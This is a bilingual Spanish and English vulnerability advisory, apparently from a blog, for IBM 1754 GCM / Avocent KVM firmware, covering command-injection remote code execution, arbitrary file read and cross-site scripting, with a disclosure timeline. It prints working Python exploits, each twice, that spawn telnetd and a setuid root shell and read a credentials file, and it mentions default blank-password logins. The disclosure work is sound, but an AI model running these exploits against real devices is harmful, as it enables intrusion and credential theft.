Descripción de producto
Los productos IBM 1754 GCM proporcionan KVM sobre IP y una tecnología de administración por consola serie en un único aparato. La vulnerabilidad se encuentra en versiones de firmware v1.20.0.22575 y anteriores.
Esta vulnerabilidad se extiende a otros productos KVM similares de otros fabricantes. Al menos, algunos modelos DELL de este KVM 'rebranded' son también vulnerables. Dell no ha respondido a mi notificación. Es posible que haya otros fabricantes afectados.

1. Remote code execution 
CVEID: CVE-2014-2085
Descripcíon: Parseado incorrecto de los los parametros de entrada permite a un atacante remoto realizar ejecución de código en el sistema operativo del KVM.
Prueba de concepto (PoC):
#!/usr/bin/python

"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""

from StringIO import StringIO
import pycurl
import os

sessid = "1111111111"
target = "192.168.0.10"

durl = "https://" + target + "/systest.php?lpres=;%20/usr/sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;"
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
        print "[*] Sending GET to " + target + " with session id " + sessid + "..."
        c.perform()
        c.close()
except:
        print ""
finally:
        print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password \"root\""
os.system("telnet " + target)
2. Arbitrary file read 
CVEID: CVE-2014-3081
Description: El dispositivo permite a un usuario autenticado la lectura de cualquier fichero de KVM.

Prueba de concepto (PoC):
#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device.
SessionId (avctSessionId) is neccesary for this to work, so you need a valid user.
alex.a.bravo@gmail.com
"""

from StringIO import StringIO
import pycurl

sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"

durl = "https://" + target + "/prodtest.php?engage=video_bits&display=results&filename=" + file
storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.COOKIE,'avctSessionId=' + sessid)
try:
        c.perform()
        c.close()
except:
        print ""

content = storage.getvalue()
print content.replace("<td>","").replace("</td>","")
3. Cross site scripting non-persistent 
CVEID: CVE-2014-3080
Description: El sistema es vulnerable a cross-site scripting, causado por una incorrecta validación de entrada de parametros. Un atacante podría usar esta vulnerabilidad para robar las credenciales de autenticación basadas en cookies.



Respuesta del fabricante:
IBM lanza la versión 1.20.20.23447

Timeline:
2014-05-20 - Fabricante (IBM PSIRT) notificado
2014-05-21 - IBM asigna ID interno
2014-07-16 - Parche publicado
2014-07-17 - Vulnerabilidad expuesta publicamente

Información externa:
IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983



 English advisory


Product description
The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables.
Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received.

1. Remote code execution 
CVEID: CVE-2014-2085
Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch.
PoC of this vulnerability:
#!/usr/bin/python"""
Exploit for Avocent KVM switch v1.20.0.22575.
Remote code execution with privilege elevation.
SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root")
alex.a.bravo@gmail.com
"""

from StringIO import StringIO
import pycurl
import os

sessid = "1111111111"
target = "192.168.0.10"

durl = "https://" + target + "/systest.php?lpres=;%20/usr/
sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%206755%20/tmp/su%20;"

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,
storage.write)
c.setopt(c.COOKIE,'
avctSessionId=' + sessid)

try:
        print "[*] Sending GET to " + target + " with session id " + sessid + "..."
        c.perform()
        c.close()
except:
        print ""
finally:
        print "[*] Done"
print "[*] Trying telnet..."
print "[*] Login as target/target, then do /tmp/su - and enter password \"root\""
os.system("telnet " + target)
2. Arbitrary file read 
CVEID: CVE-2014-3081
Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target.

PoC of this vulnerability:
#!/usr/bin/python
"""
This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device.
SessionId (avctSessionId) is neccesary for this to work, so you need a valid user.
alex.a.bravo@gmail.com
"""

from StringIO import StringIO
import pycurl

sessid = "1111111111"
target = "192.168.0.10"
file = "/etc/IBM_user.dat"

durl = "https://" + target + "/prodtest.php?engage=video_
bits&display=results&filename=" + file

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, durl)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,
storage.write)
c.setopt(c.COOKIE,'
avctSessionId=' + sessid)

try:
        c.perform()
        c.close()
except:
        print ""

content = storage.getvalue()
print content.replace("<td>","").
replace("</td>","")
3. Cross site scripting non-persistent 
CVEID: CVE-2014-3080
Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.


Vendor Response:
IBM release 1.20.20.23447 firmware

Timeline:
2014-05-20 - Vendor (PSIRT) notified
2014-05-21 - Vendor assigns internal ID
2014-07-16 - Patch Disclosed
2014-07-17 - Vulnerability disclosed

External Information:
Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html
IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983

0 comentarios:

Publicar un comentario

Nube de Bits, 2011. Con la tecnología de Blogger.